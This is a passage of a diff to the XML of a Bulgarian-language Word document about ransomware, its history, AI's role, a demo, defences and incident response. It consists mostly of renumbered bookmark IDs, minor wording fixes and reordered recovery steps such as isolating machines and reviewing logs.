                 <w:rStyle w:val="Hyperlink"/>
@@ -1395,7 +1395,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223896486 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc224154935 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1438,7 +1438,7 @@
               <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223896487" w:history="1">
+          <w:hyperlink w:anchor="_Toc224154936" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1473,7 +1473,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223896487 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc224154936 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1516,7 +1516,7 @@
               <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223896488" w:history="1">
+          <w:hyperlink w:anchor="_Toc224154937" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1551,7 +1551,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223896488 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc224154937 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1594,7 +1594,7 @@
               <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223896489" w:history="1">
+          <w:hyperlink w:anchor="_Toc224154938" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1621,7 +1621,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223896489 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc224154938 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1664,7 +1664,7 @@
               <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223896490" w:history="1">
+          <w:hyperlink w:anchor="_Toc224154939" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1691,7 +1691,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223896490 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc224154939 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1734,7 +1734,7 @@
               <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223896491" w:history="1">
+          <w:hyperlink w:anchor="_Toc224154940" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1761,7 +1761,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223896491 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc224154940 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1804,7 +1804,7 @@
               <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223896492" w:history="1">
+          <w:hyperlink w:anchor="_Toc224154941" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1839,7 +1839,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223896492 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc224154941 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1882,7 +1882,7 @@
               <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223896493" w:history="1">
+          <w:hyperlink w:anchor="_Toc224154942" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1917,7 +1917,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223896493 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc224154942 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1961,7 +1961,7 @@
               <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223896494" w:history="1">
+          <w:hyperlink w:anchor="_Toc224154943" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2018,7 +2018,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223896494 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc224154943 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2062,7 +2062,7 @@
               <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223896495" w:history="1">
+          <w:hyperlink w:anchor="_Toc224154944" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2105,7 +2105,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223896495 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc224154944 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2149,7 +2149,7 @@
               <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223896496" w:history="1">
+          <w:hyperlink w:anchor="_Toc224154945" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2191,7 +2191,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223896496 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc224154945 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2235,7 +2235,7 @@
               <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223896497" w:history="1">
+          <w:hyperlink w:anchor="_Toc224154946" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2286,7 +2286,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223896497 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc224154946 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2330,7 +2330,7 @@
               <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223896498" w:history="1">
+          <w:hyperlink w:anchor="_Toc224154947" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2381,7 +2381,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223896498 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc224154947 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2424,7 +2424,7 @@
               <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223896499" w:history="1">
+          <w:hyperlink w:anchor="_Toc224154948" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2466,7 +2466,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223896499 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc224154948 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2509,7 +2509,7 @@
               <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223896500" w:history="1">
+          <w:hyperlink w:anchor="_Toc224154949" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2536,7 +2536,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223896500 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc224154949 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2599,7 +2599,7 @@
           <w:rFonts w:eastAsia="Aptos"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Toc223896477"/>
+      <w:bookmarkStart w:id="0" w:name="_Toc224154926"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="Aptos"/>
@@ -2634,7 +2634,13 @@
         <w:t xml:space="preserve">, обикновено парична сума (в биткойн), в замяна </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">ощетения си възвръща </w:t>
+        <w:t>ощетения</w:t>
+      </w:r>
+      <w:r>
+        <w:t>т</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> си възвръща </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">откраднатите данни. </w:t>
@@ -3025,7 +3031,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc223896478"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc224154927"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">История на </w:t>
@@ -3189,7 +3195,13 @@
         <w:t xml:space="preserve"> става широко разпространен </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">от 2000 г. до настоящия момент. Преди 2000 г. киберпрестъпниците са имали затруднения при получаването на откуп. </w:t>
+        <w:t>от 2000 г.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> и продължава да бъде актуален </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">до настоящия момент. Преди 2000 г. киберпрестъпниците са имали затруднения при получаването на откуп. </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">Появата на биткойна и криптовалутите променят това. </w:t>
@@ -3437,7 +3449,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_Toc223896479"/>
+      <w:bookmarkStart w:id="2" w:name="_Toc224154928"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Еволюция на </w:t>
@@ -3464,7 +3476,7 @@
           <w:numId w:val="2"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc223896480"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc224154929"/>
       <w:r>
         <w:t xml:space="preserve">Ранна фаза на </w:t>
       </w:r>
@@ -3798,7 +3810,7 @@
           <w:numId w:val="2"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc223896481"/>
+      <w:bookmarkStart w:id="5" w:name="_Toc224154930"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -4469,7 +4481,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc223896482"/>
+      <w:bookmarkStart w:id="8" w:name="_Toc224154931"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -5043,7 +5055,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="11" w:name="_Toc223896483"/>
+      <w:bookmarkStart w:id="11" w:name="_Toc224154932"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -5336,7 +5348,7 @@
           <w:numId w:val="2"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="13" w:name="_Toc223896484"/>
+      <w:bookmarkStart w:id="13" w:name="_Toc224154933"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -5743,7 +5755,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="15" w:name="_Toc223896485"/>
+      <w:bookmarkStart w:id="15" w:name="_Toc224154934"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -5884,7 +5896,19 @@
         <w:t>в</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> страната. Причина за атаката е най-вероятно човешка грешка – отваряне на съмнителен имейл, след което вируса се разпространява из цялата мрежа, оставайки незабелязан. Киберпрестъпниците успяват да криптира голяма част от наличната информация. Прилагат и двойно изнудване в биткойн – откуп едновременно за декриптиране и за непубликуваното на информацията в интернет</w:t>
+        <w:t xml:space="preserve"> страната. Причина за </w:t>
+      </w:r>
+      <w:r>
+        <w:t>пробива</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> е най-вероятно човешка грешка – отваряне на съмнителен имейл, след което вирус</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ът</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> се разпространява из цялата мрежа, оставайки незабелязан. Киберпрестъпниците успяват да криптира голяма част от наличната информация. Прилагат и двойно изнудване в биткойн – откуп едновременно за декриптиране и за непубликуваното на информацията в интернет</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> пространството</w:t>
@@ -6027,7 +6051,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="16" w:name="_Toc223896486"/>
+      <w:bookmarkStart w:id="16" w:name="_Toc224154935"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Ролята на </w:t>
@@ -6103,7 +6127,13 @@
         <w:ind w:firstLine="709"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">С навлизането на ИИ броят хакери се е увеличал значително. </w:t>
+        <w:t xml:space="preserve">С навлизането на ИИ броят хакери се е </w:t>
+      </w:r>
+      <w:r>
+        <w:t>увеличил</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> значително. </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6274,7 +6304,16 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>AI:</w:t>
+        <w:t>AI</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> за автоматизация</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6513,7 +6552,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="17" w:name="_Toc223896487"/>
+      <w:bookmarkStart w:id="17" w:name="_Toc224154936"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Имплементация на </w:t>
@@ -8150,7 +8189,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="19" w:name="_Toc223896488"/>
+      <w:bookmarkStart w:id="19" w:name="_Toc224154937"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Демонстрация на </w:t>
@@ -8167,7 +8206,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="20" w:name="_Toc223896489"/>
+      <w:bookmarkStart w:id="20" w:name="_Toc224154938"/>
       <w:r>
         <w:t>Съдържание на текстовите файлове преди криптирането:</w:t>
       </w:r>
@@ -8294,7 +8333,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="21" w:name="_Toc223896490"/>
+      <w:bookmarkStart w:id="21" w:name="_Toc224154939"/>
       <w:r>
         <w:t>Стартиране на демото:</w:t>
       </w:r>
@@ -8632,7 +8671,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="22" w:name="_Toc223896491"/>
+      <w:bookmarkStart w:id="22" w:name="_Toc224154940"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Потърпевшият </w:t>
@@ -8894,7 +8933,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="23" w:name="_Toc223896492"/>
+      <w:bookmarkStart w:id="23" w:name="_Toc224154941"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -8978,7 +9017,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="24" w:name="_Toc223896493"/>
+      <w:bookmarkStart w:id="24" w:name="_Toc224154942"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Стратегии и защита от </w:t>
@@ -8999,7 +9038,7 @@
           <w:numId w:val="6"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="25" w:name="_Toc223896494"/>
+      <w:bookmarkStart w:id="25" w:name="_Toc224154943"/>
       <w:r>
         <w:t xml:space="preserve">Подготовка за </w:t>
       </w:r>
@@ -9245,7 +9284,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="26" w:name="_Toc223896495"/>
+      <w:bookmarkStart w:id="26" w:name="_Toc224154944"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Превенция </w:t>
@@ -9912,7 +9951,7 @@
           <w:szCs w:val="20"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="29" w:name="_Toc223896496"/>
+      <w:bookmarkStart w:id="29" w:name="_Toc224154945"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Компрометирани </w:t>
@@ -10161,7 +10200,13 @@
         <w:t>backdoor</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> (фиг. 10)</w:t>
+        <w:t xml:space="preserve"> (фиг. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>26</w:t>
+      </w:r>
+      <w:r>
+        <w:t>)</w:t>
       </w:r>
       <w:r>
         <w:t>.</w:t>
@@ -10493,7 +10538,13 @@
         <w:t xml:space="preserve">: </w:t>
       </w:r>
       <w:r>
-        <w:t>Диаграма защо използването на пароли по подразбиране не е препоръчително.</w:t>
+        <w:t xml:space="preserve">Диаграма </w:t>
+      </w:r>
+      <w:r>
+        <w:t>показваща защо използването</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> на пароли по подразбиране не е препоръчително.</w:t>
       </w:r>
       <w:bookmarkEnd w:id="30"/>
     </w:p>
@@ -10511,7 +10562,7 @@
       <w:r>
         <w:br w:type="page"/>
       </w:r>
-      <w:bookmarkStart w:id="31" w:name="_Toc223896497"/>
+      <w:bookmarkStart w:id="31" w:name="_Toc224154946"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -10652,7 +10703,21 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> за фишинг (фиг. 11)</w:t>
+        <w:t xml:space="preserve"> за </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>фишинг</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> (фиг. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>27</w:t>
+      </w:r>
+      <w:r>
+        <w:t>)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10803,7 +10868,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> фишинг имейл в Outlook.</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>фишинг</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> имейл в Outlook.</w:t>
       </w:r>
       <w:bookmarkEnd w:id="32"/>
     </w:p>
@@ -10818,7 +10891,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="33" w:name="_Toc223896498"/>
+      <w:bookmarkStart w:id="33" w:name="_Toc224154947"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Други форми на </w:t>
@@ -11052,7 +11125,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="34" w:name="_Toc223896499"/>
+      <w:bookmarkStart w:id="34" w:name="_Toc224154948"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Какво да направим, ако станем жертва на</w:t>
@@ -11125,7 +11198,13 @@
         <w:t>,</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> да се изключат самите машите поотделно. С приоритет са най-критично важните системи. </w:t>
+        <w:t xml:space="preserve"> да се изключат</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> машините</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> поотделно. С приоритет са най-критично важните системи. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11234,10 +11313,25 @@
         <w:spacing w:line="360" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>Смяна на всички идентификационни данни</w:t>
-      </w:r>
-      <w:r>
-        <w:t>, задължително на пострадалите.</w:t>
+        <w:t>З</w:t>
+      </w:r>
+      <w:r>
+        <w:t>адължителн</w:t>
+      </w:r>
+      <w:r>
+        <w:t>а</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>с</w:t>
+      </w:r>
+      <w:r>
+        <w:t>мяна на всички идентификационни данни</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> на пострадалите.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11253,7 +11347,7 @@
         <w:t>Преди опит за възстановяване, първо да се направи пълни копия на засегнатите системи. Ще послужи в по-нататъшното разследване.</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> Ако ще се възстановява от тях е важно да се направи проверка дали и те не са афектирани.</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11266,16 +11360,10 @@
         <w:spacing w:line="360" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Изключване на устройствата, ако по никакъв начин не могат да се изолират. Това вероятно ще унищожи и доказателства, понеже част от доказателствата се съхраняват и в </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">RAM </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">паметта. Да се прилага само в крайни случаи. </w:t>
+        <w:t xml:space="preserve">При възстановяване от резервни копия да се направи </w:t>
+      </w:r>
+      <w:r>
+        <w:t>проверка дали не са афектирани.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11288,7 +11376,16 @@
         <w:spacing w:line="360" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>Ако има системите, които не са засегнати, да се отделят.</w:t>
+        <w:t xml:space="preserve">Изключване на устройствата, ако по никакъв начин не могат да се изолират. Това вероятно ще унищожи и доказателства, понеже част от доказателствата се съхраняват и в </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">RAM </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">паметта. Да се прилага само в крайни случаи. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11301,24 +11398,7 @@
         <w:spacing w:line="360" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Прегледайте всички възможни системни, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>EDR, IDS, IPS</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>логове</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>.</w:t>
+        <w:t>Ако има системите, които не са засегнати, да се отделят.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11331,30 +11411,24 @@
         <w:spacing w:line="360" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Ransomware</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> е само финалната част, трябва да се прегледат по-ранни </w:t>
+        <w:t xml:space="preserve">Прегледайте всички възможни системни, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>EDR, IDS, IPS</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>компроментации</w:t>
+        <w:t>логове</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">. Много е вероятно да има други </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>dropper</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> злонамерени софтуери. Трябва да бъдат отстранени преди възстановяване на системата.</w:t>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11367,17 +11441,30 @@
         <w:spacing w:line="360" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Всякакви новосъздадени акаунти, ескалирани привилегии или много често </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>.exe</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> файлове трябва да бъдат отстранени.</w:t>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Ransomware</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> е само финалната част, трябва да се прегледат по-ранни </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>компроментации</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">. Много е вероятно да има други </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>dropper</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> злонамерени софтуери. Трябва да бъдат отстранени преди възстановяване на системата.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11390,34 +11477,17 @@
         <w:spacing w:line="360" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Да се наблюдава изпълнението на </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>PowerShell</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> команди, използването на </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>RMM</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> софтуер, неочаквани комуникации по мрежата и извличане на</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>идентификационни данни</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Всякакви новосъздадени акаунти, ескалирани привилегии или много често </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.exe</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> файлове трябва да бъдат отстранени.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11430,7 +11500,34 @@
         <w:spacing w:line="360" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>Ако има неочаквано голям изходящ трафик, най-вероятно се извличат незаконно данни.</w:t>
+        <w:t xml:space="preserve">Да се наблюдава изпълнението на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
